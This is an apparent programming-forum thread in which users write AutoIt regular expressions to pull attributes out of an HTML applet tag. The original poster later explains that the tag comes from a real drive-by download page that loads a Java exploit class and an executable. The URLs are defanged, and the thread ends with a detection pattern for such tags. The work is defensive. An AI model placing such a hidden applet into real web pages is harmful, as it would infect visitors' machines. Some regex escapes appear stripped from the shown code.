Jump to content

Regex for applet


Recommended Posts

hello,

I need help in generating a single regex for the following.

<body>
<applet archive="h__p://www.w______y.com/userfiles/file/Applet.jar" code="ScriptEngineExp.class" width="1" height="1">
<param name="data" value="h__p://www.w______y.com/userfiles/file/Applet19.exe"/>
</applet>
</body>

Presently using 4 different regex's for the above mentioned string starting with applet archive: I need to retrive the url, code, width and height.

Secondly, there can be multiple applets, hence I am extracting the text from <applet to /applet> and then executing four regex statements.

applet_archive= (?i)(?:<[\s*]{0,1}applet[^>]*)archive[\s*]?=[\s*]?["']{0,1}(.*?)['"]{0,1}(?: |>|\s)
applet_class= (?i)(?:<[\s*]{0,1}applet[^>]*)code[\s*]?=[\s*]?["']{0,1}(.*?)['"]{0,1}(?: |>|\s)
applet_width= (?i)(?:<[\s*]{0,1}applet[^>]*)width[\s*]?=[\s*]?["']{0,1}(.*?)['"]{0,1}(?: |>|\s)
applet_height= (?i)(?:<[\s*]{0,1}applet[^>]*)height[\s*]?=[\s*]?["']{0,1}(.*?)['"]{0,1}(?: |>|\s)
Link to comment
Share on other sites

Are the parameters all the time the same?

#include<Array.au3>
$str = '<body>' & @CRLF & _
'<applet archive="h__p://www.w______y.com/userfiles/file/Applet.jar" code="ScriptEngineExp.class" width="1" height="1">' & @CRLF & _
'<param name="data" value="h__p://www.w______y.com/userfiles/file/Applet19.exe"/>' & @CRLF & _
'</applet>' & @CRLF & _
'</body>'
$re = StringRegExp($str, '"(.*?)"', 3)
_ArrayDisplay($re)

Scripts & functions Organize Includes Let Scite organize the include files

Yahtzee The game "Yahtzee" (Kniffel, DiceLion)

LoginWrapper Secure scripts by adding a query (authentication)

_RunOnlyOnThis UDF Make sure that a script can only be executed on ... (Windows / HD / ...)

Internet-Café Server/Client Application Open CD, Start Browser, Lock remote client, etc.

MultipleFuncsWithOneHotkey Start different funcs by hitting one hotkey different times

Link to comment
Share on other sites

Or even something like this:

#include<Array.au3>
$str = '<body>' & @CRLF & _
  '<applet archive="h__p://www.w______y.com/userfiles/file/Applet.jar" code="ScriptEngineExp.class" width="1" height="1">' & @CRLF & _
  '<param name="data" value="h__p://www.w______y.com/userfiles/file/Applet19.exe"/>' & @CRLF & _
  '</applet>' & @CRLF & _
  '</body>'
ConsoleWrite(StringRegExpReplace($str, '(?s).*archive="(.*?)".*code="(.*?)".*width="(d+)".*height="(d+)".*', 'archive: $1' & @CRLF & 'class: $2' & @CRLF & 'width: $3' & @CRLF & 'height: $4') & @LF)

Scripts & functions Organize Includes Let Scite organize the include files

Yahtzee The game "Yahtzee" (Kniffel, DiceLion)

LoginWrapper Secure scripts by adding a query (authentication)

_RunOnlyOnThis UDF Make sure that a script can only be executed on ... (Windows / HD / ...)

Internet-Café Server/Client Application Open CD, Start Browser, Lock remote client, etc.

MultipleFuncsWithOneHotkey Start different funcs by hitting one hotkey different times

Link to comment
Share on other sites

deltarocked,

I am trying to get regexp so thought I would take a whack at this. I came up with the following:

StringRegExp($Value, "archive="(.*?)"|code="(.*?)"|width="(.*?)"|height="(.*?)"", 3)
however, it returns an array with blank elements between the results that I expect. I hope that this helps and that one of the regex mavens will enlighten us (jeez, watching too much television).

kylomas

edit: additional data

I'm using the regex tester by szhlopp found at http://www.autoitscript.com/forum/topic/...ester-v2/page__view__findpost_

edit2: figured out that the problem is the space delimiting the pattern but do NOT know how to NOT return the space as a match

Edited by kylomas

Forum Rules         Procedure for posting code

"I like pigs.  Dogs look up to us.  Cats look down on us.  Pigs treat us as equals."

- Sir Winston Churchill

Link to comment
Share on other sites

I am trying to get regexp so thought I would take a whack at this. I came up with the following:

StringRegExp($Value, "archive="(.*?)"|code="(.*?)"|width="(.*?)"|height="(.*?)"", 3)
however, it returns an array with blank elements between the results that I expect. I hope that this helps and that one of the regex mavens will enlighten us (jeez, watching too much television).
kylomas

In this case the 'or' | is not appropriate. You should use wildcards between the parts to be captured.

Like this

$aResult=StringRegExp($str, 'archive="([^"]*).*code="([^"]*).*width="([^"]*).*height="([^"]*)', 3)

or this

$aResult=StringRegExp($str, 'archive="(.*?)".*code="(.*?)".*width="(.*?)".*height="(.*?)"', 3)

"Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the universe trying to build bigger and better idiots. So far, the universe is winning."- Rick Cook

Link to comment
Share on other sites

Apologies to deltrocked for intruding...

@Bowmore,

When I use pattern #2 it works perfectly, however, when I do this

archive=(.*?).*code=(.*?).*width=(.*?)
intending to get the same strings including the quotes I get two blank elements and a match on the third. ???

kylomas

edit: I think this is because I do NOT have a terminating delimiter, but how to include the quotes and use the quotes as the terminator?

edit2: got it by doing this

archive=(".*?").*code=(".*?")
Edited by kylomas

Forum Rules         Procedure for posting code

"I like pigs.  Dogs look up to us.  Cats look down on us.  Pigs treat us as equals."

- Sir Winston Churchill

Link to comment
Share on other sites

Don't miss a question mark in case it's needed either. It isn't the actual case here but that is worth knowing.

You see, by default, PCRE is "greedy", which means that an unlimited repetition (+ or * or {n,}) will match the longest string possible. This is particularly important when .* is used.

E.g. the pattern '(.*)abc' applied to 'xxxxxxxxxxxxxabcyyyyyyyyyyyyyyyyyabczzzzzz'

matches 'xxxxxxxxxxxxxabcyyyyyyyyyyyyyyyyyabc'

In other terms, PCRE makes .* match the longest string that still doesn't cause the rest of the pattern to fail.

Now use a non-greedy pattern by applying the ? qualifier (which is nor the same as the ? "optional" modifier which is a synonym of {0,1}) and things change:

the pattern '(.*?)abc' applied to 'xxxxxxxxxxxxxabcyyyyyyyyyyyyyyyyyabczzzzzz' matches 'xxxxxxxxxxxxxabc'

that is the shortest string that still doesn't cause the rest of the pattern to fail.

So in the above post, when you have archive=(".*?").*code=(".*?") you rely on the line not having more than one occurence of code=.

Else you find yourself in situation 1 above (too greedy). This in fact may happen since line breaks between html markup are completely unimportant and there may be none or many.

This wonderful site allows debugging and testing regular expressions (many flavors available). An absolute must have in your bookmarks.
Another excellent RegExp tutorial. Don't forget downloading your copy of up-to-date pcretest.exe and pcregrep.exe here
RegExp tutorial: enough to get started
PCRE v8.33 regexp documentation latest available release and currently implemented in AutoIt beta.

SQLitespeed is another feature-rich premier SQLite manager (includes import/export). Well worth a try.
SQLite Expert (freeware Personal Edition or payware Pro version) is a very useful SQLite database manager.
An excellent eBook covering almost every aspect of SQLite3: a must-read for anyone doing serious work.
SQL tutorial (covers "generic" SQL, but most of it applies to SQLite as well)
A work-in-progress SQLite3 tutorial. Don't miss other LxyzTHW pages!
SQLite official website with full documentation (may be newer than the SQLite library that comes standard with AutoIt)

Link to comment
Share on other sites

hello everybody,

a little bit of history about this snippet . This snippet is an actual working DriveBy Download html code. and all driveby downloads which are based on Java have the same syntax but nothing can be said about their positions or the "Line Feed" or the Spaces between them.

code="ScriptEngineExp.class" width="1" height="1"

These 3 parameters are a gievaway that this is a malacious code

Logical reasoning: Width and Height cannot be 1 or less than 50 unless the intent is malicious. These dimensions are viewed by a user

ScriptEngineExp.class is a java class which executes commands. :)

The individual regex's which I have written essentially cover all the tricks used by hackers to ensure that it returns on exact value , irrespective of the " or ' or no quotes , cuase anything can be used in HTML and still it is parsed.

Thanks again for the efforts and the discussion.

Regards

Deltarocked

Edited by deltarocked
Link to comment
Share on other sites

Try this one

(?i)code=[x22x27]?script.+?.class[x22x27]?s*width=[x22x27]?d[x22x27]?s*height=[x22x27]?d[x22x27]?

I could probably shorten it down but it should work as is.

George

Question about decompiling code? Read the decompiling FAQ and don't bother posting the question in the forums.

Be sure to read and follow the forum rules. -AKA the AutoIt Reading and Comprehension Skills test.***

The PCRE (Regular Expression) ToolKit for AutoIT - (Updated Oct 20, 2011 ver:3.0.1.13) - Please update your current version before filing any bug reports. The installer now includes both 32 and 64 bit versions. No change in version number.

Visit my Blog .. currently not active but it will soon be resplendent with news and views. Also please remove any links you may have to my website. it is soon to be closed and replaced with something else.

"Old age and treachery will always overcome youth and skill!"

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share

×
×
  • Create New...